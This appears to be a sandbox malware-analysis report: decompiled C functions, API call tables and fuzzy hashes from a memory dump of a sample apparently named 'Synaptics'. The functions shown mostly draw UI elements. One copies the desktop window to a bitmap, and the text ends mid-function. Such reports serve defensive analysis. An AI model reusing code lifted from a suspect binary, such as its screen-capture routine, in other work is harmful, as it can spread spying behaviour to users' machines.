                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                          			E00448030(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E00447BD0(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E00429914(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E0042AD38(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E004255DC( *((intOrPtr*)(E00429EDC( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00419804(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E00429EDC( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E00425980(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00447D0C(_t118));
						L0042C454();
						E00419804(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54))));
						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E00425C68(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L004072B8();
						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E00425C68(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L004072B8();
						return _t96;
					}
					_push(_a8);
					_push(E00447A20(_t142));
					E00448008(_t118, _t142);
					_push(E00447A20(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00425C68(__ecx));
					_push(_v8);
					_t117 = E00447D0C(_t118);
					_push(_t117);
					L0042C454();
					return _t117;
				}
				return _t46;
			}




















                                                                                                                                                                                          0x00448030
                                                                                                                                                                                          0x00448039
                                                                                                                                                                                          0x0044803b
                                                                                                                                                                                          0x0044803e
                                                                                                                                                                                          0x00448042
                                                                                                                                                                                          0x00448049
                                                                                                                                                                                          0x0044804f
                                                                                                                                                                                          0x00448053
                                                                                                                                                                                          0x00448099
                                                                                                                                                                                          0x0044809d
                                                                                                                                                                                          0x004480ab
                                                                                                                                                                                          0x004480ad
                                                                                                                                                                                          0x004480b4
                                                                                                                                                                                          0x004480c0
                                                                                                                                                                                          0x004480c8
                                                                                                                                                                                          0x004480ca
                                                                                                                                                                                          0x004480ca
                                                                                                                                                                                          0x004480dd
                                                                                                                                                                                          0x004480f1
                                                                                                                                                                                          0x004480f9
                                                                                                                                                                                          0x004480fd
                                                                                                                                                                                          0x00448102
                                                                                                                                                                                          0x00448103
                                                                                                                                                                                          0x00448108
                                                                                                                                                                                          0x0044810a
                                                                                                                                                                                          0x0044810c
                                                                                                                                                                                          0x0044810e
                                                                                                                                                                                          0x00448110
                                                                                                                                                                                          0x00448112
                                                                                                                                                                                          0x00448114
                                                                                                                                                                                          0x00448123
                                                                                                                                                                                          0x00448127
                                                                                                                                                                                          0x0044812f
                                                                                                                                                                                          0x00448130
                                                                                                                                                                                          0x0044814c
                                                                                                                                                                                          0x0044815e
                                                                                                                                                                                          0x00448169
                                                                                                                                                                                          0x00448175
                                                                                                                                                                                          0x0044817d
                                                                                                                                                                                          0x00448185
                                                                                                                                                                                          0x0044818a
                                                                                                                                                                                          0x0044818f
                                                                                                                                                                                          0x00448191
                                                                                                                                                                                          0x00448196
                                                                                                                                                                                          0x0044819a
                                                                                                                                                                                          0x0044819e
                                                                                                                                                                                          0x004481a3
                                                                                                                                                                                          0x004481a7
                                                                                                                                                                                          0x004481a7
                                                                                                                                                                                          0x004481a8
                                                                                                                                                                                          0x004481a9
                                                                                                                                                                                          0x004481aa
                                                                                                                                                                                          0x004481b7
                                                                                                                                                                                          0x004481c3
                                                                                                                                                                                          0x004481cb
                                                                                                                                                                                          0x004481d3
                                                                                                                                                                                          0x004481d8
                                                                                                                                                                                          0x004481dd
                                                                                                                                                                                          0x004481df
                                                                                                                                                                                          0x004481e4
                                                                                                                                                                                          0x004481e8
                                                                                                                                                                                          0x004481ec
                                                                                                                                                                                          0x004481f0
                                                                                                                                                                                          0x004481f1
                                                                                                                                                                                          0x004481f4
                                                                                                                                                                                          0x004481f5
                                                                                                                                                                                          0x004481f6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004481f6
                                                                                                                                                                                          0x00448058
                                                                                                                                                                                          0x00448061
                                                                                                                                                                                          0x00448064
                                                                                                                                                                                          0x0044806e
                                                                                                                                                                                          0x0044806f
                                                                                                                                                                                          0x00448071
                                                                                                                                                                                          0x00448076
                                                                                                                                                                                          0x0044807a
                                                                                                                                                                                          0x00448082
                                                                                                                                                                                          0x00448086
                                                                                                                                                                                          0x00448089
                                                                                                                                                                                          0x0044808e
                                                                                                                                                                                          0x0044808f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044808f
                                                                                                                                                                                          0x00448201

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73752430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                                                                                                                                                          • 73752430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                                                                                                                                                          • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                                                                                                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                                                                                                                                                          • 73CD97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 004481AA
                                                                                                                                                                                            • Part of subcall function 00448008: 73752240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: 73752430Color$73752240Text
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1345666146-0
                                                                                                                                                                                          • Opcode ID: ab44610fbabe63d1efb5402cb7d40d97d5a42581b57647a3f1f398fe194eb632
                                                                                                                                                                                          • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab44610fbabe63d1efb5402cb7d40d97d5a42581b57647a3f1f398fe194eb632
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043F740 Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0043F740(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E004398B8(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E00441704(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E00441704(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E004398B8(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E0043C130(_t82, _t99, 0x14, 0);
				E0043C130(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E0041AC6C( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043F740(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                                                                                                                                                                          0x0043f74b
                                                                                                                                                                                          0x0043f74d
                                                                                                                                                                                          0x0043f74f
                                                                                                                                                                                          0x0043f75b
                                                                                                                                                                                          0x0043f765
                                                                                                                                                                                          0x0043f777
                                                                                                                                                                                          0x0043f77c
                                                                                                                                                                                          0x0043f780
                                                                                                                                                                                          0x0043f795
                                                                                                                                                                                          0x0043f7af
                                                                                                                                                                                          0x0043f7b4
                                                                                                                                                                                          0x0043f7b9
                                                                                                                                                                                          0x0043f7bb
                                                                                                                                                                                          0x0043f7c2
                                                                                                                                                                                          0x0043f7c2
                                                                                                                                                                                          0x0043f797
                                                                                                                                                                                          0x0043f797
                                                                                                                                                                                          0x0043f79e
                                                                                                                                                                                          0x0043f79e
                                                                                                                                                                                          0x0043f7c9
                                                                                                                                                                                          0x0043f7db
                                                                                                                                                                                          0x0043f7ea
                                                                                                                                                                                          0x0043f7f7
                                                                                                                                                                                          0x0043f80f
                                                                                                                                                                                          0x0043f80f
                                                                                                                                                                                          0x0043f81f
                                                                                                                                                                                          0x0043f82f
                                                                                                                                                                                          0x0043f834
                                                                                                                                                                                          0x0043f83c
                                                                                                                                                                                          0x0043f87b
                                                                                                                                                                                          0x0043f880
                                                                                                                                                                                          0x0043f885
                                                                                                                                                                                          0x0043f891
                                                                                                                                                                                          0x0043f83e
                                                                                                                                                                                          0x0043f841
                                                                                                                                                                                          0x0043f844
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f847
                                                                                                                                                                                          0x0043f84a
                                                                                                                                                                                          0x0043f851
                                                                                                                                                                                          0x0043f85a
                                                                                                                                                                                          0x0043f85f
                                                                                                                                                                                          0x0043f863
                                                                                                                                                                                          0x0043f86e
                                                                                                                                                                                          0x0043f86e
                                                                                                                                                                                          0x0043f873
                                                                                                                                                                                          0x0043f876
                                                                                                                                                                                          0x0043f876
                                                                                                                                                                                          0x0043f876
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f851

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SaveDC.GDI32 ref: 0043F756
                                                                                                                                                                                            • Part of subcall function 004398B8: GetWindowOrgEx.GDI32(?), ref: 004398C6
                                                                                                                                                                                            • Part of subcall function 004398B8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004398DC
                                                                                                                                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F777
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 0043F78D
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 0043F7AF
                                                                                                                                                                                          • SetRect.USER32 ref: 0043F7DB
                                                                                                                                                                                          • DrawEdge.USER32(?,?,?,00000000), ref: 0043F7EA
                                                                                                                                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F80F
                                                                                                                                                                                          • RestoreDC.GDI32(?,?), ref: 0043F880
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2976466617-0
                                                                                                                                                                                          • Opcode ID: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                                                                                                                                                          • Instruction ID: 5550dfeaeb93720f68ac000546fd20648b8bffa49c9e266dbbfe82f03f6cc12f
                                                                                                                                                                                          • Opcode Fuzzy Hash: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2416671F002046BDB04EA99CC81FDE77A9AF49304F10416AF904EB396D778ED0587A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004751FC Relevance: 12.1, APIs: 8, Instructions: 85COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E004751FC() {
				void* _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebp;
				signed int _t20;
				short _t34;
				intOrPtr* _t39;
				short* _t51;
				signed int _t52;
				short _t53;
				struct tagRECT* _t54;

				GetWindowRect(GetDesktopWindow(), _t54);
				_t39 = E00429914(1);
				 *((intOrPtr*)( *_t39 + 0x40))();
				_t20 =  *((intOrPtr*)( *_t39 + 0x34))();
				_push(0);
				L00407638();
				_t52 = _t20;
				_push(0x26);
				_push(_t52);
				L00407380();
				if((_t20 & 0x00000100) == 0x100) {
					_t51 = E0040275C(0x404);
					E004032B4(_t51, 0x404);
					 *_t51 = 0x300;
					_t6 = _t51 + 4; // 0x4
					_t34 = _t6;
					_push(_t34);
					_push(0x100);
					_push(0);
					_push(_t52);
					L004073C0();
					_t53 = _t34;
					 *((short*)(_t51 + 2)) = _t53;
					if(_t53 != 0) {
						L00407308();
						 *((intOrPtr*)( *_t39 + 0x38))(_t51);
					}
					E0040277C(_t51);
				}
				_push(0xcc0020);
				_push(0);
				_push(0);
				_push(_t52);
				_push(_v32 - _v40);
				_push(_v36 - _v44);
				_push(0);
				_push(0);
				_push(E00425C68(E00429EDC(_t39)));
				L004072B8();
				_push(_t52);
				_push(0);
				L00407888();
				return _t39;
			}


















                                                                                                                                                                                          0x0047520a
                                                                                                                                                                                          0x0047521b
                                                                                                                                                                                          0x00475228
                                                                                                                                                                                          0x00475237
                                                                                                                                                                                          0x0047523a
                                                                                                                                                                                          0x0047523c
                                                                                                                                                                                          0x00475241
                                                                                                                                                                                          0x00475243
                                                                                                                                                                                          0x00475245
                                                                                                                                                                                          0x00475246
                                                                                                                                                                                          0x00475255
                                                                                                                                                                                          0x00475261
                                                                                                                                                                                          0x0047526c
                                                                                                                                                                                          0x00475271
                                                                                                                                                                                          0x00475276
                                                                                                                                                                                          0x00475276
                                                                                                                                                                                          0x00475279
                                                                                                                                                                                          0x0047527a
                                                                                                                                                                                          0x0047527f
                                                                                                                                                                                          0x00475281
                                                                                                                                                                                          0x00475282
                                                                                                                                                                                          0x00475287
                                                                                                                                                                                          0x00475289
                                                                                                                                                                                          0x00475290
                                                                                                                                                                                          0x00475293
                                                                                                                                                                                          0x0047529e
                                                                                                                                                                                          0x0047529e
                                                                                                                                                                                          0x004752a3
                                                                                                                                                                                          0x004752a3
                                                                                                                                                                                          0x004752a8
                                                                                                                                                                                          0x004752ad
                                                                                                                                                                                          0x004752af
                                                                                                                                                                                          0x004752b1
                                                                                                                                                                                          0x004752ba
                                                                                                                                                                                          0x004752c3
                                                                                                                                                                                          0x004752c4
                                                                                                                                                                                          0x004752c6
                                                                                                                                                                                          0x004752d4
                                                                                                                                                                                          0x004752d5
                                                                                                                                                                                          0x004752da
                                                                                                                                                                                          0x004752db
                                                                                                                                                                                          0x004752dd
                                                                                                                                                                                          0x004752eb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00475204
                                                                                                                                                                                          • GetWindowRect.USER32 ref: 0047520A
                                                                                                                                                                                          • 73CCAC50.USER32(00000000), ref: 0047523C
                                                                                                                                                                                          • 73CCAD70.GDI32(00000000,00000026,00000000), ref: 00475246
                                                                                                                                                                                          • 73CCAEF0.GDI32(00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475282
                                                                                                                                                                                          • 73CCA8F0.GDI32(00000000,00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475293
                                                                                                                                                                                          • 73CD97E0.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752D5
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$B380DesktopRect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2454875651-0
                                                                                                                                                                                          • Opcode ID: b010c522aae21e05d9ca0b7fda6b020350c35e4439bfa40056778aebef1b6fa8
                                                                                                                                                                                          • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                                                                                                                                                          • Opcode Fuzzy Hash: b010c522aae21e05d9ca0b7fda6b020350c35e4439bfa40056778aebef1b6fa8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004265A0 Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 26%
                                                                                                                                                                                          			E004265A0(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E004029DC(_t24, 0x40,  &_v1032);
				_push(0);
				L00407638();
				_v8 = _t25;
				_push(_t54);
				_push(0x42669d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00407380();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L004073C0();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L004073C0();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L004073C0();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L004073C0();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L004073C0();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x4266a4);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407888();
				return _t29;
			}

















                                                                                                                                                                                          0x004265a1
                                                                                                                                                                                          0x004265aa
                                                                                                                                                                                          0x004265b3
                                                                                                                                                                                          0x004265c7
                                                                                                                                                                                          0x004265cc
                                                                                                                                                                                          0x004265ce
                                                                                                                                                                                          0x004265d3
                                                                                                                                                                                          0x004265d8
                                                                                                                                                                                          0x004265d9
                                                                                                                                                                                          0x004265de
                                                                                                                                                                                          0x004265e1
                                                                                                                                                                                          0x004265e4
                                                                                                                                                                                          0x004265e6
                                                                                                                                                                                          0x004265e9
                                                                                                                                                                                          0x004265ea
                                                                                                                                                                                          0x004265ef
                                                                                                                                                                                          0x004265f4
                                                                                                                                                                                          0x00426600
                                                                                                                                                                                          0x00426601
                                                                                                                                                                                          0x00426603
                                                                                                                                                                                          0x00426608
                                                                                                                                                                                          0x00426609
                                                                                                                                                                                          0x00426618
                                                                                                                                                                                          0x00426674
                                                                                                                                                                                          0x00426675
                                                                                                                                                                                          0x0042667a
                                                                                                                                                                                          0x0042667e
                                                                                                                                                                                          0x0042667f
                                                                                                                                                                                          0x0042661a
                                                                                                                                                                                          0x00426620
                                                                                                                                                                                          0x00426621
                                                                                                                                                                                          0x00426628
                                                                                                                                                                                          0x0042662c
                                                                                                                                                                                          0x0042662d
                                                                                                                                                                                          0x00426640
                                                                                                                                                                                          0x00426641
                                                                                                                                                                                          0x00426646
                                                                                                                                                                                          0x0042664a
                                                                                                                                                                                          0x0042664b
                                                                                                                                                                                          0x00426656
                                                                                                                                                                                          0x00426657
                                                                                                                                                                                          0x00426659
                                                                                                                                                                                          0x0042665e
                                                                                                                                                                                          0x0042665f
                                                                                                                                                                                          0x0042665f
                                                                                                                                                                                          0x00426618
                                                                                                                                                                                          0x00426686
                                                                                                                                                                                          0x00426689
                                                                                                                                                                                          0x0042668c
                                                                                                                                                                                          0x00426691
                                                                                                                                                                                          0x00426694
                                                                                                                                                                                          0x00426695
                                                                                                                                                                                          0x00426697
                                                                                                                                                                                          0x0042669c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCAC50.USER32(00000000), ref: 004265CE
                                                                                                                                                                                          • 73CCAD70.GDI32(?,00000068,00000000,0042669D,?,00000000), ref: 004265EA
                                                                                                                                                                                          • 73CCAEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 00426609
                                                                                                                                                                                          • 73CCAEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042662D
                                                                                                                                                                                          • 73CCAEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D), ref: 0042664B
                                                                                                                                                                                          • 73CCAEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0042665F
                                                                                                                                                                                          • 73CCAEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042667F
                                                                                                                                                                                          • 73CCB380.USER32(00000000,?,004266A4,0042669D,?,00000000), ref: 00426697
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: B380
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 120756276-0
                                                                                                                                                                                          • Opcode ID: 6fb2f2ebad3923b2675d5100b93e3e3b3c14a84b95167fdc7a6b0f3afa72cc61
                                                                                                                                                                                          • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fb2f2ebad3923b2675d5100b93e3e3b3c14a84b95167fdc7a6b0f3afa72cc61
                                                                                                                                                                                          • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402A1C Relevance: 11.4, APIs: 9, Instructions: 109COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E0040500C(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
